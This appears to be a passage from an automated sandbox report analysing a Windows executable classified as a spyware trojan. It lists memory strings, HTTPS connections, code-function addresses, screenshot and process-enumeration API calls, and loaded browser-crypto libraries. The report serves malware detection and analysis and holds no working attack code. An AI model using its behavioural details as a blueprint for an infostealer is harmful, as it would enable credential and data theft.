                          Source: UMrFwHyjUi.exe, 00000002.00000003.2571750793.00000000179E1000.00000004.00000020.00020000.00000000.sdmp, JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2571750793.00000000179E1000.00000004.00000020.00020000.00000000.sdmp, JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                          Source: unknownHTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00411F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_00411F2A
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess,2_2_0040145B
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC762C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,2_2_6CC762C0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001B10A30_2_001B10A3
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001EF2730_2_001EF273
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001A943C0_2_001A943C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001E34270_2_001E3427
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001DE5170_2_001DE517
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001DB5AF0_2_001DB5AF
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001EF6110_2_001EF611
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001DD7B70_2_001DD7B7
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001928050_2_00192805
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001AF8400_2_001AF840
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019F9EC0_2_0019F9EC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001EF9E30_2_001EF9E3
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00192A0F0_2_00192A0F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00199B050_2_00199B05
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001A7C320_2_001A7C32
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019FD340_2_0019FD34
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001A2D900_2_001A2D90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001EEDDE0_2_001EEDDE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001EFDCB0_2_001EFDCB
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001928051_2_00192805
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001AF8401_2_001AF840
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001B10A31_2_001B10A3
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019F9EC1_2_0019F9EC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00192A0F1_2_00192A0F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00199B051_2_00199B05
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001A943C1_2_001A943C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001A7C321_2_001A7C32
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019FD341_2_0019FD34
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001A2D901_2_001A2D90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041C4B72_2_0041C4B7
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042D9832_2_0042D983
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042D2132_2_0042D213
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041954F2_2_0041954F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042DD6B2_2_0042DD6B
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042CD7E2_2_0042CD7E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042D5B12_2_0042D5B1
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041B7572_2_0041B757
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB4ECD02_2_6CB4ECD0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAEECC02_2_6CAEECC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBCAC302_2_6CBCAC30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB6C002_2_6CBB6C00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAFAC602_2_6CAFAC60
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC7CDC02_2_6CC7CDC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF4DB02_2_6CAF4DB0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB86D902_2_6CB86D90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC1AD502_2_6CC1AD50
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBED702_2_6CBBED70
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC78D202_2_6CC78D20
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB76E902_2_6CB76E90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAFAEC02_2_6CAFAEC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB90EC02_2_6CB90EC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBD0E202_2_6CBD0E20
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8EE702_2_6CB8EE70
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAFEFB02_2_6CAFEFB0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBCEFF02_2_6CBCEFF0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF0FE02_2_6CAF0FE0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC38FB02_2_6CC38FB0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF6F102_2_6CAF6F10
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB2F702_2_6CBB2F70
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC30F202_2_6CC30F20
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB5EF402_2_6CB5EF40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBF68E02_2_6CBF68E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB408202_2_6CB40820
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB7A8202_2_6CB7A820
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC48402_2_6CBC4840
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB09B02_2_6CBB09B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB809A02_2_6CB809A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBAA9A02_2_6CBAA9A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC0C9E02_2_6CC0C9E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB249F02_2_6CB249F0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB469002_2_6CB46900
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB289602_2_6CB28960
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB6EA802_2_6CB6EA80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBA8A302_2_6CBA8A30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB9EA002_2_6CB9EA00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB6CA702_2_6CB6CA70
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB90BA02_2_6CB90BA0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBF6BE02_2_6CBF6BE0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC1A4802_2_6CC1A480
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB364D02_2_6CB364D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8A4D02_2_6CB8A4D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB7A4302_2_6CB7A430
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB544202_2_6CB54420
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB084602_2_6CB08460
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAE45B02_2_6CAE45B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB7E5F02_2_6CB7E5F0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBA5E02_2_6CBBA5E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC385502_2_6CC38550
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB905702_2_6CB90570
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB525602_2_6CB52560
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB485402_2_6CB48540
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBF45402_2_6CBF4540
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB4E6E02_2_6CB4E6E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8E6E02_2_6CB8E6E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB146D02_2_6CB146D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB4C6502_2_6CB4C650
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB1A7D02_2_6CB1A7D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB707002_2_6CB70700
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB000B02_2_6CB000B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBCC0B02_2_6CBCC0B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAE80902_2_6CAE8090
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB80102_2_6CBB8010
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBC0002_2_6CBBC000
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB3E0702_2_6CB3E070
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF01E02_2_6CAF01E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB661302_2_6CB66130
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBD41302_2_6CBD4130
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB581402_2_6CB58140
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC762C02_2_6CC762C0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBE2B02_2_6CBBE2B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC22A02_2_6CBC22A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC82202_2_6CBC8220
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBBA2102_2_6CBBA210
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB782602_2_6CB78260
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB882502_2_6CB88250
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB4E3B02_2_6CB4E3B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB223A02_2_6CB223A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB443E02_2_6CB443E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB623202_2_6CB62320
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC0C3602_2_6CC0C360
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC323702_2_6CC32370
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB863702_2_6CB86370
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF23702_2_6CAF2370
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF83402_2_6CAF8340
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC2DCD02_2_6CC2DCD0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8FC802_2_6CB8FC80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBB1CE02_2_6CBB1CE0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB01C302_2_6CB01C30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC19C402_2_6CC19C40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAF3C402_2_6CAF3C40
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CAE3D802_2_6CAE3D80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC39D902_2_6CC39D90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC1DC02_2_6CBC1DC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB53D002_2_6CB53D00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB13EC02_2_6CB13EC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC75E602_2_6CC75E60
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBFDE102_2_6CBFDE10
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC4BE702_2_6CC4BE70
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC0DFC02_2_6CC0DFC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC73FC02_2_6CC73FC0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB11F902_2_6CB11F90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC7DAE0 appears 56 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 001A72BA appears 34 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC709D0 appears 253 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 0019A280 appears 100 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CB13620 appears 71 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC29F30 appears 31 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 001A0E5A appears 42 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 004104BC appears 36 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 004105DE appears 71 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CC7D930 appears 45 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: String function: 6CB19B10 appears 72 times
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272
                          Source: UMrFwHyjUi.exeStatic PE information: invalid certificate
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2721027676.000000006CF12000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2686404821.0000000000FB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2705821873.0000000029F71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2712188709.0000000035E57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs UMrFwHyjUi.exe
                          Source: UMrFwHyjUi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/24@2/2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB50300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,2_2_6CB50300
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_0041147A
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,2_2_0041196C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199786602107[1].htmJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1004
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCommand line argument: `*"1_2_00192F7C
                          Source: UMrFwHyjUi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
